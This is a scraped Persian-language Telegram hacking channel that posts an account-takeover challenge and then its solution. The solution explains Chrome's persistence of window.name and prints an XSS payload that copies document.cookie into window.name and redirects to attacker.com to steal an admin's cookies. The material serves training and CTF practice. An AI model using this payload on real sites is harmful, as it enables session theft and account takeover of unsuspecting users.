🔥6
❤3
😱6🤣4❤1👍1
Forwarded from | | Sharo K h | |
Challenge Time
سلام دوستان یه چالش اکانت تیک اور قشنگ آوردیم
هدف چالش اینه که یه لینک بفرستید به ادمین کلیک کنه و کوکی هاش فرستاده بشه به سایت اتکر
فاز نکنید کل چالش تو همین صفحه هستش
راه حل هاتونو پی وی بفرستید
@arlrouh
https://rouhbakhsh.xyz/index2.php
سطح چالش: سخت
سلام دوستان یه چالش اکانت تیک اور قشنگ آوردیم
هدف چالش اینه که یه لینک بفرستید به ادمین کلیک کنه و کوکی هاش فرستاده بشه به سایت اتکر
فاز نکنید کل چالش تو همین صفحه هستش
راه حل هاتونو پی وی بفرستید
@arlrouh
https://rouhbakhsh.xyz/index2.php
سطح چالش: سخت
❤9
BugBounty & Hacking Resources
Challenge Time سلام دوستان یه چالش اکانت تیک اور قشنگ آوردیم هدف چالش اینه که یه لینک بفرستید به ادمین کلیک کنه و کوکی هاش فرستاده بشه به سایت اتکر فاز نکنید کل چالش تو همین صفحه هستش راه حل هاتونو پی وی بفرستید @arlrouh https://rouhbakhsh.xyz/index2.php…
بعد از اینکه راه حلشو بذارن
مال خودمو هم میذارم خیلی چیز حقی شد
مال خودمو هم میذارم خیلی چیز حقی شد
🔥10
Please open Telegram to view this post
VIEW IN TELEGRAM
❤13😁7🤣6🔥2
Forwarded from GO-TO CVE (| | Sharo K h | |)
Solution:
هدف اصلی ما از این چالش این بود که در مرورگرها، آبجکت window یک property به نام name داره که بهصورت پیشفرض یک رشتهٔ خالیه.
در مرورگر Google Chrome، وقتی مقداری برای این property ست میکنیم، کروم اون مقدار رو پاک نمیکنه مگر اینکه یه مقدار جدید جایگزینش بشه یا کل window بسته بشه.
اکسپلویت این موضوع به این شکله:
بعد از اینکه پنجره به سایت اتکر ریدایرکت شد، اونجا میشه یه کد جاوااسکریپت نوشت و مقدار کوکی رو از داخل window.name خوند.
هدف اصلی ما از این چالش این بود که در مرورگرها، آبجکت window یک property به نام name داره که بهصورت پیشفرض یک رشتهٔ خالیه.
در مرورگر Google Chrome، وقتی مقداری برای این property ست میکنیم، کروم اون مقدار رو پاک نمیکنه مگر اینکه یه مقدار جدید جایگزینش بشه یا کل window بسته بشه.
اکسپلویت این موضوع به این شکله:
";window.name=document.cookie;location.href="//attacker.com";//
بعد از اینکه پنجره به سایت اتکر ریدایرکت شد، اونجا میشه یه کد جاوااسکریپت نوشت و مقدار کوکی رو از داخل window.name خوند.
❤4👏2